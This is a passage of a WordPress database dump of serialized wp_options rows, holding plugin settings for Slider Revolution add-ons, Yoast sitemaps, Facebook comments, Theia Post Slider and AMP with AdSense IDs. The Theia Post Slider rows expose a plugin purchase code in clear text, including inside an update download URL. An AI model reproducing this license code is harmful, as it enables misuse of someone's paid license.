effect\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"20\";s:11:\"last_update\";s:10:\"2020-08-11\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"15\";s:9:\"releaseid\";s:2:\"15\";s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"1.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"40\";s:11:\"last_update\";s:10:\"2020-10-17\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch.tools/revslider/addons/images/addon_beforeafter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"3\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"5.3.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"1.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:2:\"50\";s:11:\"last_update\";s:10:\"2020-06-18\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch.tools/revslider/addons/images/addon_typewriter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"21\";s:9:\"releaseid\";s:2:\"21\";s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"70\";s:11:\"last_update\";s:10:\"2020-05-05\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch.tools/revslider/addons/images/addon_distortion.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"23\";s:9:\"releaseid\";s:2:\"23\";s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"90\";s:11:\"last_update\";s:10:\"2020-06-14\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch.tools/revslider/addons/images/addon_paintbrush.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"13\";s:9:\"releaseid\";s:2:\"13\";s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"110\";s:11:\"last_update\";s:10:\"2020-05-05\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:67:\"//updates.themepunch.tools/revslider/addons/images/addon_slicey.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"10\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"125\";s:11:\"last_update\";s:10:\"2020-05-08\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch.tools/revslider/addons/images/addon_filmstrip.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"4\";s:9:\"releaseid\";s:1:\"4\";s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"1.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"127\";s:11:\"last_update\";s:10:\"2020-01-30\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch.tools/revslider/addons/images/addon_underconstruction.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"19\";s:9:\"releaseid\";s:2:\"19\";s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"130\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:67:\"//updates.themepunch.tools/revslider/addons/images/addon_reveal.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"17\";s:9:\"releaseid\";s:2:\"17\";s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:28:\"Display images in 360 degree\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"135\";s:11:\"last_update\";s:10:\"2020-10-07\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:69:\"//updates.themepunch.tools/revslider/addons/images/addon_panorama.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"22\";s:9:\"releaseid\";s:2:\"22\";s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"150\";s:11:\"last_update\";s:10:\"2020-07-16\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch.tools/revslider/addons/images/addon_exploding.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"5\";s:9:\"releaseid\";s:1:\"5\";s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"1.1.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"165\";s:11:\"last_update\";s:10:\"2020-02-20\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch.tools/revslider/addons/images/addon_socialsharing.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"14\";s:9:\"releaseid\";s:2:\"14\";s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"180\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:69:\"//updates.themepunch.tools/revslider/addons/images/polyfold-addon.jpg\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"304\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"330\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:67:\"//updates.themepunch.tools/revslider/addons/images/reload-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"303\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post content\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"340\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch.tools/revslider/addons/images/related-posts-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"6\";s:9:\"releaseid\";s:1:\"6\";s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"1.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"380\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:65:\"//updates.themepunch.tools/revslider/addons/images/snow-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"2\";s:9:\"releaseid\";s:1:\"2\";s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"430\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch.tools/revslider/addons/images/wp-gallery-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}}s:22:\"revslider-backup-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"302\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"500\";s:11:\"last_update\";s:10:\"2020-01-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:67:\"//updates.themepunch.tools/revslider/addons/images/backup-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"1\";s:9:\"releaseid\";s:1:\"8\";s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"620\";s:11:\"last_update\";s:10:\"2022-01-01\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:64:\"//updates.themepunch.tools/revslider/addons/images/404-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"9\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"630\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:69:\"//updates.themepunch.tools/revslider/addons/images/adjacent-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"11\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"650\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:66:\"//updates.themepunch.tools/revslider/addons/images/login-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"12\";s:9:\"releaseid\";s:2:\"12\";s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"660\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"16\";s:9:\"releaseid\";s:2:\"16\";s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with you!\";s:9:\"available\";s:5:\"1.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"690\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:68:\"//updates.themepunch.tools/revslider/addons/images/weather-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"18\";s:9:\"releaseid\";s:2:\"18\";s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"710\";s:11:\"last_update\";s:10:\"2020-01-01\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:68:\"//updates.themepunch.tools/revslider/addons/images/duotone-addon.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}}}','yes'),(27059,'can_compress_scripts','0','no'),(27089,'fresh_site','0','yes'),(27090,'theme_mods_','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(27091,'wpseo_sitemap_nav_menu_cache_validator','69BoR','no'),(27092,'wpseo_sitemap_nav_menu_item_cache_validator','69BoT','no'),(27093,'wpseo_sitemap_441_cache_validator','69qib','no'),(27094,'wpseo_sitemap_wpcf7_contact_form_cache_validator','69Jhf','no'),(27097,'fbcomments','a:13:{s:5:\"appID\";s:15:\"126206381223953\";s:4:\"mods\";s:0:\"\";s:4:\"fbml\";s:2:\"on\";s:4:\"fbns\";s:2:\"on\";s:5:\"html5\";s:2:\"on\";s:8:\"language\";s:5:\"en_US\";s:6:\"scheme\";s:5:\"light\";s:3:\"num\";s:1:\"5\";s:5:\"width\";s:4:\"100%\";s:5:\"title\";s:8:\"Comments\";s:10:\"titleclass\";s:0:\"\";s:8:\"countmsg\";s:0:\"\";s:10:\"countstyle\";s:0:\"\";}','yes'),(27176,'external_updates-main','O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1513441909;s:14:\"checkedVersion\";s:6:\"1.14.0\";s:6:\"update\";O:8:\"stdClass\":9:{s:2:\"id\";i:0;s:4:\"slug\";s:4:\"main\";s:7:\"version\";s:6:\"1.15.1\";s:8:\"homepage\";N;s:6:\"tested\";N;s:12:\"download_url\";s:129:\"https://wecodepixels.com/shop/theia-post-slider-for-wordpress/?get_update_file&purchase_code=657581fb-9cd3-4e23-aee4-1e462b789fd9\";s:14:\"upgrade_notice\";N;s:8:\"filename\";s:26:\"theia-post-slider/main.php\";s:12:\"translations\";a:0:{}}}','no'),(27177,'tps_dashboard','a:3:{s:13:\"purchase_code\";s:36:\"657581fb-9cd3-4e23-aee4-1e462b789fd9\";s:32:\"reset_global_settings_to_default\";s:0:\"\";s:34:\"reset_all_post_settings_to_default\";s:0:\"\";}','yes'),(27178,'tps_general','a:13:{s:17:\"transition_effect\";s:5:\"slide\";s:16:\"transition_speed\";d:400;s:10:\"theme_type\";s:4:\"font\";s:5:\"theme\";s:18:\"buttons-orange.css\";s:15:\"theme_font_name\";s:14:\"chevron-circle\";s:20:\"theme_font_leftClass\";s:28:\"tps-icon-chevron-circle-left\";s:21:\"theme_font_rightClass\";s:29:\"tps-icon-chevron-circle-right\";s:16:\"theme_font_color\";s:7:\"#f08100\";s:15:\"theme_font_size\";d:48;s:22:\"theme_background_color\";s:0:\"\";s:13:\"theme_padding\";d:0;s:19:\"theme_border_radius\";d:0;s:10:\"custom_css\";s:0:\"\";}','yes'),(27179,'tps_nav','a:16:{s:15:\"navigation_text\";s:33:\"%{currentSlide} of %{totalSlides}\";s:11:\"helper_text\";s:56:\"Use your ← → (arrow) keys to browse\";s:9:\"prev_text\";s:4:\"Prev\";s:9:\"next_text\";s:4:\"Next\";s:12:\"button_width\";d:0;s:14:\"prev_text_post\";s:9:\"Prev post\";s:14:\"next_text_post\";s:9:\"Next post\";s:17:\"button_width_post\";d:0;s:16:\"button_behaviour\";s:8:\"standard\";s:23:\"post_navigation_inverse\";b:0;s:29:\"post_navigation_same_category\";b:0;s:23:\"nav_horizontal_position\";s:5:\"right\";s:21:\"nav_vertical_position\";s:14:\"top_and_bottom\";s:26:\"disable_keyboard_shortcuts\";b:0;s:20:\"scroll_after_refresh\";b:1;s:17:\"scroll_top_offset\";d:0;}','yes'),(27180,'tps_advanced','a:8:{s:27:\"default_activation_behavior\";d:1;s:10:\"post_types\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:23:\"slide_loading_mechanism\";s:4:\"ajax\";s:11:\"refresh_ads\";b:0;s:23:\"ad_refreshing_mechanism\";s:10:\"javascript\";s:26:\"refresh_ads_every_n_slides\";d:1;s:21:\"enable_touch_gestures\";b:0;s:18:\"override_subtitles\";b:0;}','yes'),(27181,'tps_troubleshooting','a:15:{s:35:\"do_not_check_for_multiple_instances\";b:1;s:20:\"remove_canonical_rel\";b:1;s:26:\"do_not_cache_rendered_html\";b:1;s:17:\"document_ready_js\";b:0;s:14:\"window_load_js\";b:0;s:19:\"domcontentloaded_js\";b:0;s:18:\"document_resize_js\";b:0;s:18:\"document_scroll_js\";b:0;s:21:\"add_header_to_excerpt\";b:0;s:22:\"try_to_fix_broken_html\";b:0;s:20:\"disable_rocketscript\";b:0;s:13:\"excludedWords\";s:0:\"\";s:26:\"the_content_early_priority\";d:0;s:32:\"beginning_post_content_separator\";s:39:\"<p><!-- BEGIN THEIA POST SLIDER --></p>\";s:29:\"ending_post_content_separator\";s:37:\"<p><!-- END THEIA POST SLIDER --></p>\";}','yes'),(27502,'widget_td_block_author_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(27503,'widget_td_block_image_box_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(28210,'widget_td_block_pinterest_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(30137,'wpseo_sitemap_213_cache_validator','5djCk','no'),(30139,'wpseo_sitemap_215_cache_validator','5dmgJ','no'),(30141,'wpseo_sitemap_236_cache_validator','5doRe','no'),(30991,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(30992,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(30993,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(31766,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(33491,'wpseo_license_server_version','2','yes'),(33501,'redux_version_upgraded_from','3.6.2','yes'),(33504,'widget_ampforwp_categories_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(33505,'ampforwp_rewrite_flush_option','true','yes'),(33506,'redux_builder_amp','a:277:{s:8:\"last_tab\";s:1:\"2\";s:9:\"opt-media\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:31:\"ampforwp-custom-logo-dimensions\";s:1:\"0\";s:15:\"opt-media-width\";s:3:\"190\";s:16:\"opt-media-height\";s:2:\"36\";s:24:\"amp-on-off-for-all-posts\";s:1:\"1\";s:24:\"amp-on-off-for-all-pages\";s:1:\"1\";s:32:\"ampforwp-homepage-on-off-support\";s:1:\"1\";s:27:\"amp-frontpage-select-option\";s:1:\"0\";s:33:\"amp-frontpage-select-option-pages\";s:1:\"2\";s:28:\"ampforwp-title-on-front-page\";s:1:\"0\";s:24:\"ampforwp-archive-support\";s:1:\"0\";s:24:\"ampforwp-content-builder\";s:1:\"0\";s:16:\"enable-amp-ads-1\";s:1:\"1\";s:23:\"enable-amp-ads-select-1\";s:1:\"5\";s:34:\"enable-amp-ads-text-feild-client-1\";s:23:\"ca-pub-7270870419197348\";s:32:\"enable-amp-ads-text-feild-slot-1\";s:10:\"4503708332\";s:16:\"enable-amp-ads-2\";s:1:\"1\";s:23:\"enable-amp-ads-select-2\";s:1:\"5\";s:34:\"enable-amp-ads-text-feild-client-2\";s:23:\"ca-pub-7270870419197348\";s:32:\"enable-amp-ads-text-feild-slot-2\";s:10:\"4503708332\";s:16:\"enable-amp-ads-3\";s:1:\"0\";s:23:\"enable-amp-ads-select-3\";s:1:\"2\";s:34:\"enable-amp-ads-text-feild-client-3\";s:0:\"\";s:32:\"enable-amp-ads-text-feild-slot-3\";s:0:\"\";s:16:\"enable-amp-ads-4\";s:1:\"1\";s:23:\"enable-amp-ads-select-4\";s:1:\"1\";s:34:\"enable-amp